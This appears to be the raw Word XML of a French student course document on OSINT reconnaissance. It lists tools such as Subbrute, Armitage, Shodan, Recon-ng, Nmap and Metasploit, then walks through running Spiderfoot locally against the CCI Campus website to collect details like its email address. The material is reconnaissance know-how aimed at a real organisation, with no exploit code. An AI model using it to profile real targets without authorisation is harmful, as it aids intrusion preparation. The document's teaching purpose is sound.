              <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="4AF19F6A" wp14:editId="327D912E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3638550</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>207787</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="209550" cy="523875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="11" name="Flèche vers le bas 11"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="3069750" y="758750"/>
                          <a:ext cx="194400" cy="5010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832C1F6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B7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 w14:anchorId="4AF19F6A" id="Flèche vers le bas 11" o:spid="_x0000_s1043" type="#_x0000_t67" style="position:absolute;margin-left:286.5pt;margin-top:16.35pt;width:16.5pt;height:41.25pt;z-index:2516756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" adj="17409" fillcolor="#cfe2f3">
                <v:stroke startarrowwidth="narrow" startarrowlength="short" endarrowwidth="narrow" endarrowlength="short" joinstyle="round"/>
                <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                  <w:txbxContent>
                    <w:p w14:paraId="6832C1F6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:jc w:val="center"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8DF7C0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="506641B6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="7DF3CF76" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0D6AD4BC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251676672" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="16376C3A" wp14:editId="673FB0BA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2571750</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>129587</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2190750" cy="1143000"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="15" name="Zone de texte 15"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="1996050" y="912125"/>
                          <a:ext cx="2167800" cy="1124700"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="C9DAF8"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="299B4DC4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:line="275" w:lineRule="auto"/>
                              <w:jc w:val="center"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>On vas fair une recherche sur le site du CCI CAMPUS : Cliquer sur le site Report et tapez l’adresse du site &lt;&lt;https://www.ccicampus.fr&gt;&gt;</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="16376C3A" id="Zone de texte 15" o:spid="_x0000_s1044" type="#_x0000_t202" style="position:absolute;margin-left:202.5pt;margin-top:10.2pt;width:172.5pt;height:90pt;z-index:25167667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" fillcolor="#c9daf8" stroked="f">
                <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                  <w:txbxContent>
                    <w:p w14:paraId="299B4DC4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:line="275" w:lineRule="auto"/>
                        <w:jc w:val="center"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>On vas fair une recherche sur le site du CCI CAMPUS : Cliquer sur le site Report et tapez l’adresse du site &lt;&lt;https://www.ccicampus.fr&gt;&gt;</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="566FF54E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="20229657" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="69EE5BBF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="7842ADE9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="3116C9B1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="5244637E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="24A9AA99" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="116BD09A" wp14:editId="702E4F2D">
            <wp:extent cx="5731200" cy="2794000"/>
            <wp:effectExtent l="0" t="0" r="0" b="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731200" cy="2794000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C02708C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t>on utilise Site report et on saisit l’adresse du site du CCI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A470D8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="3BA06A22" wp14:editId="14146CB3">
            <wp:extent cx="5731200" cy="25146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2514600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5389DAF8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6AA24764" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6E99A55C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1769B90E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>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23B72" w14:paraId="4E35203F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9029" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="CC0000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="CC0000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="CC0000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="CC0000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9EAD3"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4DED00A9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Titre3"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="36" w:name="_o75qv4cbvsqy" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkEnd w:id="36"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Les réseaux sociaux</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="183F448A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="672300FA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="44E96CD5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="4A010471" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="24142D75" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6E9ADA67" wp14:editId="45B99748">
            <wp:extent cx="5476875" cy="34290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76875" cy="3429000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3520A324" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="401F7A6A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="12A80249" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>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23B72" w14:paraId="6B079AB1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9029" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="CC0000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="CC0000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="CC0000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="CC0000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9EAD3"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="526C72D3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Titre3"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:bookmarkStart w:id="37" w:name="_gbwr14h4nn90" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkEnd w:id="37"/>
            <w:r>
              <w:t>Les outils d’automatisation OSINT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="257DED5C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1DC661F4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="5EA8859C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SUBBRUTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021AA5D1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ARMITAGE (peut faire de la recherche et de l’attaque en même temps)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5357E4DE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SHODAN IO (site web payant qui font de la recherche sur tout ce qui est </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> matérielle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF3FD5A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">RECON-NG </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444B5B55" w14:textId="1694C9FF" w:rsidR="00223B72" w:rsidRDefault="007E7234">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FBAC9D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>OSINT FRAMEWORK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6719C99E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>NMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8C2244" w14:textId="373FF4A1" w:rsidR="007E7234" w:rsidRDefault="007E7234">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">META SPOIT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63589048" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="57A40AD9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_p5xwjq8ado2s" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="38"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Spiderfoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4107DD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="18D78BBE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Lancement de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Spiderfoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en mode </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> web pour une meilleur utilisation et visualisation du résultat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2018C56D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="715AB26C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">tapez : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>spiderfoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -l 127.0.0.1:5151</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7BD28B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="7BED745A" wp14:editId="5F95A0AC">
            <wp:extent cx="5731200" cy="2794000"/>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1200" cy="2794000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C48FB56" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="66DEC7BD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Lancer le navigateur </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:hyperlink r:id="rId17">
        <w:r w:rsidR="00223B72">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://127.0.0.1:5151</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> et cliquez sur </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nwescan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA19207" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="0A41C99E" wp14:editId="18E071CA">
            <wp:extent cx="4872038" cy="2719277"/>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872038" cy="2719277"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="506BCD64" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="757A1F7B" wp14:editId="6916AE5D">
            <wp:extent cx="4862513" cy="2334329"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7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4862513" cy="2334329"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B34DAB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="43B778E1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Les éléments trouvé</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A52ED2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="262C0938" wp14:editId="026A5E3F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>19051</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>114300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4843463" cy="3918216"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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4843463" cy="3918216"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C021B63" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="47E16A6C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2DBC99B0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="3760B05B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="135A6E79" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0F4CE284" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="139A8B2B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2AD9A05A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="79E96B38" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0AC32AF9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="7C544E06" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="49422587" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="09A694DF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="56A9E6E8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="4F0C3F74" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="23EB1192" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0C0DCC02" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Exemple:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> nous avons le mail du </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ccicampusol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08582486" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="45AE5381" wp14:editId="4BC653AE">
            <wp:extent cx="5731200" cy="1384300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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731200" cy="1384300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="387DDA35" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="4F28FF91" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1285268F" wp14:editId="19250874">
            <wp:extent cx="5731200" cy="31242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3124200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E12F1F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="43D9A31C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0F5343EA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_j1jyg4veurpx" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>OSINT Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08611A37" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="103757EC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:hyperlink r:id="rId23">
        <w:r>
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://osintframework.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3634A518" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1CAE5194" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="3CC20F13" wp14:editId="7BC929EF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>19051</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>114300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731200" cy="2590800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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31200" cy="2590800"/>
                    </a:xfrm>
